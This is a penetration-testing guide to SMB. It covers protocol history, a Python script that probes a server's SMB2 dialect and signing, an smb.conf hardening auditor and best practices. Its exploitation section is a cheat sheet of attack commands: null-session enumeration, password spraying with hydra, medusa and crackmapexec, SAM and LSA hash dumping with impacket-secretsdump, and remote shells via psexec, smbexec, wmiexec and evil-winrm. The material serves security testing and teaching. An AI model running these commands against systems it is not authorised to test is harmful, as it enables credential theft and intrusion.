Pentesting Server Message Block (SMB)

SMB (Server Message Block) is a network file and resource sharing protocol, first released in 1984 by IBM for the Disk Operating System (DOS) and later adopted and extended by Microsoft for Windows. Unix-like hosts speak it through Samba, an open-source implementation of the protocol, so SMB is now found well beyond Windows networks.

SMB provides network services such as file, printer and device sharing. Early Windows versions ran SMB on top of NetBIOS. Microsoft later moved SMB to run directly over TCP/IP; the SMB1 dialect of that era was branded the Common Internet File System (CIFS). SMB2 followed, cutting protocol chattiness and improving performance and opportunistic locking, and SMB3 added security features including message signing improvements and end-to-end encryption. SMB over NetBIOS uses ports 137 (UDP, name service), 138 (UDP, datagram service) and 139 (TCP, session service); SMB directly over TCP/IP uses TCP port 445.

Let's observe the traffic on the wire. Run a capture in one terminal and a share listing in another; the resulting exchange is shown in the SMB Communication figure.

# on terminal one
sudo tcpdump -Uni $INTERFACE 'tcp port 139 or 445'    # unbuffered capture of SMB traffic on both ports

# on terminal two
smbclient -L //$IP/ -U "$USERNAME%$PASSWORD"    # log in, list the shares and exit (double quotes so the variables expand)

Figure: SMB Communication (/images/smb/00_smb-connection.png)
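The first thing on the wire in that capture is the SMB2 NEGOTIATE exchange, and it already tells a tester which dialect the server speaks, whether signing is merely enabled or required, and whether SMB3 encryption is on offer. The following is an added example, not code from the original page: it builds the NEGOTIATE request a client sends, parses the server's reply, and can be pointed at a live host with `python3 negotiate.py $IP`. Field layouts follow MS-SMB2 sections 2.2.3 and 2.2.4; the reply it parses when run without arguments is constructed in `build_sample_response()`, not captured traffic, and the finding strings in `assess()` are this example's wording.

```python
"""SMB2 NEGOTIATE: build the client request, parse the server reply (MS-SMB2 2.2.3/2.2.4).
Every message on TCP 445 is framed by a 4-byte NetBIOS Session Service header."""
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
SIGNING_ENABLED, SIGNING_REQUIRED = 0x01, 0x02   # SecurityMode bits
CAP_ENCRYPTION = 0x40      # SMB2_GLOBAL_CAP_ENCRYPTION (SMB 3.0 / 3.0.2)
CTX_ENCRYPTION = 0x0002    # SMB2_ENCRYPTION_CAPABILITIES negotiate context (SMB 3.1.1)
CIPHERS = {1: "AES-128-CCM", 2: "AES-128-GCM", 3: "AES-256-CCM", 4: "AES-256-GCM"}
HDR_FMT, BODY_FMT = "<4sHHIHHIIQIIQ16s", "<HHHH16sIIIIQQHHI"   # 64-byte header, 64-byte fixed body


def nbss(msg):
    """NetBIOS Session Service framing: type 0x00 plus a 3-byte big-endian length."""
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def smb2_header(flags=0):
    """SMB2 header for command 0 (NEGOTIATE): no session, no signature, one credit requested."""
    return struct.pack(HDR_FMT, SMB2_MAGIC, 64, 0, 0, 0, 1, flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)):
    """Offer SMB 2.0.2 to 3.0.2 (3.1.1 also needs negotiate contexts, so it is left out here)."""
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0,
                       CAP_ENCRYPTION, uuid.uuid4().bytes, 0)
    return nbss(smb2_header() + body + b"".join(struct.pack("<H", d) for d in dialects))


def parse_negotiate_response(raw):
    """Return dialect, signing mode and encryption support from an NBSS-framed reply."""
    if len(raw) < 4 + 128 or raw[0] != 0:
        raise ValueError("not an NBSS session message carrying a NEGOTIATE response")
    msg = raw[4:4 + int.from_bytes(raw[1:4], "big")]
    if msg[:4] != SMB2_MAGIC:
        raise ValueError("not SMB2 (a 0xFF 'SMB' reply means the server only speaks SMB1)")
    status, command = struct.unpack_from("<IH", msg, 8)
    if command != 0 or status != 0:
        raise ValueError(f"unexpected command {command} / NTSTATUS {status:#010x}")
    fields = struct.unpack_from(BODY_FMT, msg, 64)
    sec_mode, dialect, ctx_count, caps, ctx_off = fields[1], fields[2], fields[3], fields[5], fields[13]
    info = {"dialect": DIALECTS.get(dialect, f"unknown {dialect:#06x}"),
            "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
            "signing_required": bool(sec_mode & SIGNING_REQUIRED),
            "encryption_capable": bool(caps & CAP_ENCRYPTION), "ciphers": []}
    if dialect == 0x0311:           # 3.1.1 negotiates ciphers through contexts instead
        off = ctx_off
        for _ in range(ctx_count):
            ctype, dlen = struct.unpack_from("<HH", msg, off)
            data = msg[off + 8:off + 8 + dlen]
            if ctype == CTX_ENCRYPTION:
                n = struct.unpack_from("<H", data)[0]
                info["ciphers"] = [CIPHERS.get(c, f"{c:#06x}") for c in struct.unpack_from(f"<{n}H", data, 2)]
                info["encryption_capable"] = bool(info["ciphers"])
            off += 8 + dlen
            off += (-off) % 8       # contexts are 8-byte aligned from the start of the SMB2 header
    return info


def assess(info):
    """Findings a pentester records from the negotiate alone."""
    findings = []
    if not info["signing_required"]:
        findings.append("signing not required: NTLM relay to this host is possible")
    if not info["encryption_capable"]:
        findings.append("no SMB3 encryption offered: share traffic is readable on the wire")
    return findings


def build_sample_response(dialect, sec_mode, caps, ciphers=()):
    """Constructed server reply (a fixture, not captured traffic) so the parser runs offline."""
    ctx = b""
    if dialect == 0x0311:
        data = struct.pack(f"<H{len(ciphers)}H", len(ciphers), *ciphers)
        ctx = struct.pack("<HHI", CTX_ENCRYPTION, len(data), 0) + data
    body = struct.pack(BODY_FMT, 65, sec_mode, dialect, 1 if ctx else 0, b"\x11" * 16, caps,
                       0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 128 if ctx else 0)
    return nbss(smb2_header(flags=0x01) + body + ctx)   # 0x01 = SMB2_FLAGS_SERVER_TO_REDIR


def probe(host, port=445, timeout=5.0):
    """Negotiate with a live server and return its parsed security posture."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        buf = b""
        while len(buf) < 4 or len(buf) < 4 + int.from_bytes(buf[1:4], "big"):
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("peer closed the connection mid-message")
            buf += chunk
    return parse_negotiate_response(buf)


if __name__ == "__main__":
    import sys
    info = probe(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(
        build_sample_response(0x0311, SIGNING_ENABLED, 0, (2, 1)))
    print(info, *assess(info), sep="\n")
```

A server that only speaks SMB1 answers with the 0xFF 'SMB' magic instead, which the parser reports as such; that is the same signal `smb-protocols` and `smb2-security-mode` in the nmap section below summarise, and "signing enabled but not required" is the usual precondition for relaying captured NTLM authentication to the host.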

Common Server Applications

  • Unix systems
    • Samba
  • Windows systems
    • Microsoft LanmanServer

Common Commands

COMMAND       USAGE                   DESCRIPTION
cd            cd $FOLDERNAME          change the remote working directory
del / rm      del $FILENAME*          delete the remote files matching the glob
dir / ls      dir [$FOLDERNAME]       list the current or the named remote directory
get           get $FILENAME           download one file to the local directory
help          help                    list supported commands
mget          mget *                  download every file in the current remote directory
mkdir / md    mkdir $FOLDERNAME       create a remote directory
mput          mput $FILENAME*         upload every matching local file to the share
put           put $FILENAME           upload one file to the share
quit / exit   quit                    end the SMB session
rmdir / rd    rmdir $FOLDERNAME       remove a remote directory

Common Vulnerability

Security Best Practices

  • Run a current SMB implementation: disable SMBv1 and prefer SMB3, whose signing and encryption defeat tampering and eavesdropping.
  • Require authentication and authorization on every share: no anonymous (null-session) or guest access, and least-privilege share and file permissions.
  • Enable host firewalls and endpoint protection, and expose TCP 445 only to the hosts that need it.
  • Implement VLANs to isolate internal network traffic and keep SMB off untrusted segments.
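On a Samba server the items above map onto a handful of smb.conf parameters, and it is worth checking them mechanically rather than by eye. The following is an added example, not code from the original page or from the Samba project: it reads an smb.conf and reports the weak values, with a deliberately weak configuration next to its hardened counterpart. The parameter names are real smb.conf(5) options; both configurations are constructed fixtures, and the decision about which values count as weak is this example's judgement.

```python
"""Audit a Samba smb.conf for the weak settings the best-practice list above warns about.
Parameter names are real smb.conf(5) options; which values count as weak is this example's call."""
import configparser

WEAK_SMB_CONF = """\
[global]
   workgroup = CORP
   server min protocol = NT1
   server signing = disabled
   smb encrypt = off
   map to guest = Bad User
   restrict anonymous = 0
   ntlm auth = yes

[public]
   path = /srv/public
   guest ok = yes
   writable = yes
"""

HARDENED_SMB_CONF = """\
[global]
   workgroup = CORP
   server min protocol = SMB3
   server signing = mandatory
   smb encrypt = required
   map to guest = Never
   restrict anonymous = 2
   ntlm auth = ntlmv2-only

[public]
   path = /srv/public
   guest ok = no
   writable = yes
"""

YES = ("yes", "true", "1")

# (parameter, weak-value predicate on the lower-cased value, finding)
GLOBAL_CHECKS = [
    ("server min protocol", lambda v: v in ("core", "coreplus", "lanman1", "lanman2", "nt1"),
     "SMB1 accepted (set 'server min protocol = SMB3', or SMB2_02 if legacy clients remain)"),
    ("server signing", lambda v: v != "mandatory",
     "signing not mandatory: client authentication can be relayed to this server (set 'server signing = mandatory')"),
    ("smb encrypt", lambda v: v not in ("required", "mandatory"),
     "encryption not required: share traffic is readable on the wire (set 'smb encrypt = required')"),
    ("map to guest", lambda v: v != "never",
     "failed logons are mapped to the guest account (set 'map to guest = Never')"),
    ("restrict anonymous", lambda v: v == "0",
     "null sessions may enumerate users and shares (set 'restrict anonymous = 2')"),
    ("ntlm auth", lambda v: v in ("yes", "ntlmv1-permitted"),
     "NTLMv1 accepted: captured responses crack quickly (set 'ntlm auth = ntlmv2-only')"),
]


def load_smb_conf(text):
    """smb.conf is INI-like; strip indentation so configparser does not read keys as continuations."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)   # Samba values use %U etc.
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))
    return cp


def audit_smb_conf(text):
    """Return [(section, finding)] for each weak setting present.
    Absent parameters fall back to Samba's defaults and are not judged here."""
    cp = load_smb_conf(text)
    findings = []
    if cp.has_section("global"):
        g = cp["global"]
        for param, is_weak, msg in GLOBAL_CHECKS:
            if param in g and is_weak(g[param].strip().lower()):
                findings.append(("global", msg))
    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]
        guest = s.get("guest ok", "no").strip().lower() in YES
        writable = (s.get("writable", s.get("writeable", "no")).strip().lower() in YES
                    or s.get("read only", "yes").strip().lower() in ("no", "false", "0"))
        if guest and writable:
            findings.append((share, "anonymous write: anyone on the network can drop files (set 'guest ok = no')"))
        elif guest:
            findings.append((share, "anonymous read: contents leak to null sessions (set 'guest ok = no')"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"[{label}]", audit_smb_conf(conf) or "no findings")
```

The audit only judges parameters that are explicitly set, because Samba's defaults for signing and encryption differ between domain controllers and member servers; run `testparm -v` to see the effective value of every parameter before deciding a missing one is safe.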

Exploitation
SMB servers are also a sink for valuable information, and an attacker who finds an improperly configured server can gain a shell on it and move laterally across the network. When an attacker encounters an SMB service, the usual questions are:

  • What valuable information can be collected from the shares?
  • Is any share writable, with the intent of capturing NTLM hashes (by planting files that coerce authentication) or gaining a shell?
  • Which high-value users exist whose credentials can be harvested?
## SERVICE ENUMERATION ##
# with nmap
ls /usr/share/nmap/scripts/smb*    # bundled SMB scripts; trimmed output:
#   /usr/share/nmap/scripts/smb2-capabilities.nse
#   /usr/share/nmap/scripts/smb2-security-mode.nse
#   /usr/share/nmap/scripts/smb2-time.nse
#   /usr/share/nmap/scripts/smb2-vuln-uptime.nse
#   /usr/share/nmap/scripts/smb-brute.nse
#   /usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse
#   /usr/share/nmap/scripts/smb-enum-domains.nse
#   /usr/share/nmap/scripts/smb-enum-groups.nse
#   /usr/share/nmap/scripts/smb-enum-processes.nse
#   /usr/share/nmap/scripts/smb-enum-services.nse
#   /usr/share/nmap/scripts/smb-enum-sessions.nse
#   /usr/share/nmap/scripts/smb-enum-shares.nse
#   /usr/share/nmap/scripts/smb-enum-users.nse
#   /usr/share/nmap/scripts/smb-flood.nse
#   /usr/share/nmap/scripts/smb-ls.nse
#   /usr/share/nmap/scripts/smb-mbenum.nse
#   /usr/share/nmap/scripts/smb-os-discovery.nse
#   /usr/share/nmap/scripts/smb-print-text.nse
#   /usr/share/nmap/scripts/smb-protocols.nse
#   /usr/share/nmap/scripts/smb-psexec.nse
#   /usr/share/nmap/scripts/smb-security-mode.nse
#   /usr/share/nmap/scripts/smb-server-stats.nse
#   /usr/share/nmap/scripts/smb-system-info.nse
#   /usr/share/nmap/scripts/smb-vuln-conficker.nse
#   /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
#   /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
#   /usr/share/nmap/scripts/smb-vuln-ms06-025.nse
#   /usr/share/nmap/scripts/smb-vuln-ms07-029.nse
#   /usr/share/nmap/scripts/smb-vuln-ms08-067.nse
#   /usr/share/nmap/scripts/smb-vuln-ms10-054.nse
#   /usr/share/nmap/scripts/smb-vuln-ms10-061.nse
#   /usr/share/nmap/scripts/smb-vuln-ms17-010.nse
#   /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
#   /usr/share/nmap/scripts/smb-vuln-webexec.nse
#   /usr/share/nmap/scripts/smb-webexec-exploit.nse
nmap -p 139,445 -sV $IP    # service and version detection
nmap -p 139,445 --script smb-protocols $IP    # list supported dialects (NT LM 0.12 in the list means SMB1 is still enabled)
nmap -p 139,445 --script 'smb-system-info,smb-os-discovery' $IP    # OS, hostname, domain and clock
nmap -p 139,445 --script 'smb*-vuln*' $IP    # check for the known vulnerabilities listed above (quote the glob so the shell does not expand it)
nmap -p 139,445 --script 'smb2*' $IP    # SMB2 capabilities, security mode (signing) and server time
nmap -p 139,445 --script 'smb-*enum*' $IP    # shares, users, groups, sessions, services

# with samba utilities
smbclient -N -L $IP    # list shares over a null session (no credentials)
smbclient -U "$USERNAME%$PASSWORD" -L $IP    # list shares authenticated (double quotes so the variables expand)
rpcclient -U '' -N $IP -c 'srvinfo'    # server info over a null session
rpcclient -U "$USERNAME%$PASSWORD" $IP -c 'lsaenumsid'    # enumerate the SIDs known to the LSA
rpcclient -U "$USERNAME%$PASSWORD" $IP -c 'querydominfo'    # domain details
rpcclient -U "$USERNAME%$PASSWORD" $IP -c 'enumdomusers'    # domain users with their RIDs
rpcclient -U "$USERNAME%$PASSWORD" $IP -c 'enumprivs'    # privileges defined on the server

# with enum4linux
enum4linux -o $IP    # OS details over a null session
enum4linux -U $IP    # list users (works only where null sessions are allowed)
enum4linux -r -u "$USERNAME" -p "$PASSWORD" $IP | grep -v 'unknown'    # enumerate users by RID cycling, dropping unresolved RIDs
enum4linux -d -S -u "$USERNAME" -p "$PASSWORD" $IP    # list shares with detail

# with impacket
impacket-psexec "$USERNAME@$IP" -no-pass    # SYSTEM shell via a writable admin share; needs local admin, -no-pass sends an empty password
impacket-smbexec "$USERNAME:$PASSWORD@$IP" -share "$SHAREFOLDERNAME"    # semi-interactive shell, command output read back through the named share
impacket-lookupsid "$USERNAME:$PASSWORD@$IP"    # users and groups by RID cycling over LSARPC
impacket-netview "$DOMAIN/$USERNAME:$PASSWORD" -target $IP    # who is logged on where

# with smbmap
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP -v    # OS version
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP    # shares with our permission on each

# with crackmapexec
cme smb -u "$USERNAME" -p "$PASSWORD" $IP --shares    # shares with permissions
cme smb -u "$USERNAME" -p "$PASSWORD" $IP --users    # domain users
cme smb -u "$USERNAME" -p "$PASSWORD" $IP -M zerologon    # check a domain controller for Zerologon (CVE-2020-1472)

## CREDENTIAL ENUMERATION ##
# with hydra
hydra -t 1 -L "$USERNAMELIST" -P "$PASSWORDLIST" smb://$IP -V    # online guessing over 445; stay under the account lockout threshold

# with impacket
impacket-samrdump "$USERNAME:$PASSWORD@$IP"    # users, groups and password policy via SAMR (no hashes)
impacket-secretsdump "$USERNAME:$PASSWORD@$IP"    # SAM hashes, LSA secrets, cached credentials and Kerberos keys; needs local admin

# with smbmap
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP -r "$SHAREFOLDERNAME" -A "$PATTERN"    # recurse the share and download files whose names match the regex

# with crackmapexec
cme smb -u "$USERNAME" -p "$PASSWORD" $IP --sam    # dump local SAM hashes; needs local admin
cme smb -u "$USERNAME" -p "$PASSWORD" $IP --lsa    # dump LSA secrets (cached domain logons, service account passwords); needs local admin
cme smb -u "$USERNAMELIST" -p "$PASSWORDLIST" $IP    # password spraying; stay under the lockout threshold

# with medusa
medusa -t 2 -T 2 -U "$USERNAMELIST" -P "$PASSWORDLIST" -h $IP -n 445 -M smbnt | grep SUCCESS    # medusa's SMB module is smbnt

## PATH ENUMERATION ##
# with smbmap
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP -R "$SHAREFOLDERNAME"    # recursively list the share
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP -R --exclude $SHAREFOLDERNAMES    # recursively list every share except the named ones
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP --upload "$FILENAME" "$SHAREFOLDERNAME/$FILENAME"    # upload a file to the share
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP --download "$SHAREFOLDERNAME/$FILENAME"    # download a file
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP --delete "$SHAREFOLDERNAME/$FILENAME"    # delete a file

# with crackmapexec
cme smb -u "$USERNAME" -p "$PASSWORD" $IP -M spider_plus -o OUTPUT=$FOLDERNAME    # crawl every readable share and save the file listing

## INTERACTIVE ACCESS AND COMMAND EXECUTION ##
# with samba utilities
smbclient -U "$USERNAME%$PASSWORD" "//$IP/$SHAREFOLDERNAME"    # interactive session on the share (commands in the table above)

# with impacket
impacket-smbclient "$USERNAME:$PASSWORD@$IP"    # impacket's SMB prompt
impacket-wmiexec "$USERNAME:$PASSWORD@$IP"    # semi-interactive shell over WMI/DCOM; needs local admin

# with smbmap
smbmap -u "$USERNAME" -p "$PASSWORD" -H $IP -x "$COMMAND"    # run one command; needs local admin

# with evil-winrm
evil-winrm -i $IP -u "$USERNAME" -p "$PASSWORD"    # shell over WinRM (TCP 5985/5986), not SMB; useful once SMB has yielded credentials
